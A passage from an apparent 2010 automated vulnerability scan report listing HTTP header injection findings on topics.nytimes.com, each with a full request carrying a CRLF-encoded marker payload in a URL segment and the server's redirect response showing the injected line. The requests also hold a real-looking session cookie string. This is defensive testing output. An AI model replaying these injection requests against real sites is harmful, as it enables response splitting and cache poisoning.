Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/9110f
f9cc7c13367/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ca88e%0d%0a95b10fb38c5 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/columnists/ca88e%0d%0a95b10fb38c5/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ca88e
95b10fb38c5/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eb712%0d%0a0beb5e0feca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/eb712%0d%0a0beb5e0feca/editorialsandoped/oped/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/eb712
0beb5e0feca/editorialsandoped/oped/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5f651%0d%0a988d28d4d19 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/5f651%0d%0a988d28d4d19/oped/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/5f651
988d28d4d19/oped/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c52f%0d%0a74ac431d19e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/3c52f%0d%0a74ac431d19e/contributors/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/3c52f
74ac431d19e/contributors/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/opinion/editorialsandoped/oped/contributors/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fc78e%0d%0aad7fb1cd36 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/fc78e%0d%0aad7fb1cd36/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:26 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/fc78e
ad7fb1cd36/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a3d8a%0d%0afeeb0597b5c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/a3d8a%0d%0afeeb0597b5c/timestopics/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:40:48 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/a3d8a
feeb0597b5c/timestopics/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 1ba27%0d%0a30fc9b65d99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/1ba27%0d%0a30fc9b65d99/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:40:48 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/1ba27
30fc9b65d99/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 12c7d%0d%0ad02959b441 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/12c7d%0d%0ad02959b441/timestopics/organizations/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/12c7d
d02959b441/timestopics/organizations/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9a0c4%0d%0a26bcdaf529 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/9a0c4%0d%0a26bcdaf529/organizations/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/9a0c4
26bcdaf529/organizations/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2d70a%0d%0a0b18576cfa6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/2d70a%0d%0a0b18576cfa6/p/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/2d70a
0b18576cfa6/p/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ca929%0d%0a23e3cdede98 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/organizations/ca929%0d%0a23e3cdede98/park51/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:33 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/organizations/ca929
23e3cdede98/park51/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/organizations/p/park51/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 6e96e%0d%0a3e5641ba8fc was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/organizations/p/6e96e%0d%0a3e5641ba8fc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:34 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/organizations/p/6e96e
3e5641ba8fc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9c59a%0d%0a76e21e137a4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/9c59a%0d%0a76e21e137a4/timestopics/people/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/9c59a
76e21e137a4/timestopics/people/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload bb56f%0d%0a3e3182b0228 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/bb56f%0d%0a3e3182b0228/people/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/bb56f
3e3182b0228/people/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 416d4%0d%0a59dfc04082f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/416d4%0d%0a59dfc04082f/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
